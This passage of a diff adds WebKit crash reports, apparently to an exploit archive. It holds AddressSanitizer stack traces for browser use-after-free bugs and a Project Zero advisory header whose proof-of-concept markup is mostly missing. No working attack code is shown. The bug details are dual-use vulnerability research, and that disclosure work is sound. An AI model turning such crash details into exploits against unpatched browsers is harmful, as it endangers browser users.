WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afb99) + #18 0x10b9f482d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af82d) + #19 0x10b9f49f8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af9f8) + #20 0x10c0407ce in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fb7ce) + #21 0x10b41b57b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdd657b) + #22 0x10bc3fe80 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x15fae80) + #23 0x10d061fa3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a1cfa3) + #24 0x10479c7a6 in WebCore::ScriptController::windowProxy(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3957a6) + #25 0x104799e28 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x392e28) + #26 0x104b78fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x771fc4) + #27 0x7fffe652f9e1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55e9e1) + #28 0x7fffe6089a67 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8a67) + #29 0x7fffe60970b1 in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc60b1) + #30 0x7fffe617121c in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x1a021c) + #31 0x10458b175 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage&, WebKit::WebFrame&, WTF::RefPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x184175) + #32 0x104b836a5 in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77c6a5) + #33 0x10b19ac45 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb55c45) + #34 0x10b18ece7 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb49ce7) + #35 0x10ae5d781 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818781) + #36 0x10a8d9047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #37 0x10a8d1df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #38 0x10d3a9661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #39 0x104f1a43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #40 0x104f1d6d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #41 0x104f1cbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #42 0x10470e117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #43 0x1044ed695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #44 0x1044f6a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #45 0x1191cb842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #46 0x1191cc1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #47 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #48 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #49 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #50 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #51 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #52 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #53 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #54 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #55 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #56 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #57 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #58 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #59 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #60 0x1043e956c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #61 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x61e00005d0d8 is located 88 bytes inside of 2920-byte region [0x61e00005d080,0x61e00005dbe8) +freed by thread T0 here: + #0 0x107656294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11921b650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x1188b9845 in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1410845) + #3 0x1188b98fa in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14108fa) + #4 0x1188b5fcd in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140cfcd) + #5 0x1188afced in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1406ced) + #6 0x1188af34e in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140634e) + #7 0x1188aefa2 in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1405fa2) + #8 0x118b641ab in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16bb1ab) + #9 0x118b5f2e2 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b62e2) + #10 0x118b5ec1a in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b5c1a) + #11 0x118b5fce6 in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b6ce6) + #12 0x118f305f2 in JSC::Subspace::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1a875f2) + #13 0x10b9f5219 in void* JSC::allocateCell(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13b0219) + #14 0x10b9f4e89 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afe89) + #15 0x10b9f4dcb in std::__1::enable_if::value, WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afdcb) + #16 0x10b9f4b99 in std::__1::enable_if::value), WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afb99) + #17 0x10b9f482d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af82d) + #18 0x10b9f49f8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af9f8) + #19 0x10c0407ce in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fb7ce) + #20 0x10b41b57b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdd657b) + #21 0x10bc3fe80 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x15fae80) + #22 0x10d061fa3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a1cfa3) + #23 0x10479c7a6 in WebCore::ScriptController::windowProxy(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3957a6) + #24 0x104799e28 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x392e28) + #25 0x104b78fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x771fc4) + #26 0x7fffe652f9e1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55e9e1) + #27 0x7fffe6089a67 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8a67) + #28 0x7fffe60970b1 in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc60b1) + #29 0x7fffe617121c in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x1a021c) + +previously allocated by thread T0 here: + #0 0x107655d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11921bad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x119219d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x1191a0247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11919f63a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10a78b648 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x10ae0549d in WebCore::HTMLDocument::create(WebCore::Frame*, WebCore::URL const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7c049d) + #8 0x10aea7ce9 in WebCore::DOMImplementation::createHTMLDocument(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x862ce9) + #9 0x10ba41880 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13fc880) + #10 0x10ba3e938 in long long WebCore::IDLOperation::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13f9938) + #11 0x5c8fdbe01027 () + #12 0x118b53e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #13 0x118b4cf6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #14 0x1187b0847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #15 0x11873188a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #16 0x117d4a731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #17 0x117d4a9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #18 0x117d4ad13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #19 0x10b883615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #20 0x10bc966cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #21 0x10b002010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #22 0x10b001ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #23 0x10afc9b97 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x984b97) + #24 0x10afcabde in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985bde) + #25 0x10afca553 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985553) + #26 0x10afca1de in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9851de) + #27 0x10aa19a86 in WebCore::dispatchChildRemovalEvents(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3d4a86) + #28 0x10aa14152 in WebCore::willRemoveChildren(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cf152) + #29 0x10aa13cb0 in WebCore::ContainerNode::replaceAllChildren(WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cecb0) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5a4a) in WebCore::TreeScope::documentScope() const +Shadow bytes around the buggy address: + 0x1c3c0000b9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c3c0000b9d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000b9e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000b9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x1c3c0000ba00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x1c3c0000ba10: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd + 0x1c3c0000ba20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x1c3c0000ba60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29647==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43167.js b/platforms/multiple/dos/43167.js new file mode 100644 index 000000000..a4b77cd81 --- /dev/null +++ b/platforms/multiple/dos/43167.js @@ -0,0 +1,210 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + +
+
+ + +/* +================================================================= + +ASan log: + +================================================================= +==29682==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800005dca8 at pc 0x00011110054b bp 0x7fff58adafe0 sp 0x7fff58adafd8 +READ of size 8 at 0x60800005dca8 thread T0 +==29682==WARNING: invalid path to external symbolizer! +==29682==WARNING: Failed to use and restart external symbolizer! + #0 0x11110054a in WebCore::InputType::element() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20654a) + #1 0x113e51440 in WebCore::TextFieldInputType::forwardEvent(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f57440) + #2 0x111c8c71f in WebCore::HTMLInputElement::defaultEventHandler(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9271f) + #3 0x11187fd55 in WebCore::callDefaultEventHandlersInTheBubblingOrder(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x985d55) + #4 0x11187f65e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98565e) + #5 0x11184fe15 in WebCore::Element::dispatchFocusEvent(WTF::RefPtr&&, WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x955e15) + #6 0x1116a011d in WebCore::Document::setFocusedElement(WebCore::Element*, WebCore::FocusDirection, WebCore::Document::FocusRemovalEventsMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7a611d) + #7 0x11196a1d7 in WebCore::FocusController::setFocusedElement(WebCore::Element*, WebCore::Frame&, WebCore::FocusDirection) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa701d7) + #8 0x111a638c1 in WebCore::FrameSelection::setFocusedElementIfNeeded() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb698c1) + #9 0x111a631f6 in WebCore::FrameSelection::setSelectionWithoutUpdatingAppearance(WebCore::VisibleSelection const&, unsigned int, WebCore::FrameSelection::CursorAlignOnScroll, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb691f6) + #10 0x111a60f94 in WebCore::FrameSelection::setSelection(WebCore::VisibleSelection const&, unsigned int, WebCore::AXTextStateChangeIntent, WebCore::FrameSelection::CursorAlignOnScroll, WebCore::TextGranularity) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb66f94) + #11 0x111a61b9f in WebCore::FrameSelection::moveWithoutValidationTo(WebCore::Position const&, WebCore::Position const&, bool, bool, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb67b9f) + #12 0x111d44152 in WebCore::HTMLTextFormControlElement::setSelectionRange(int, 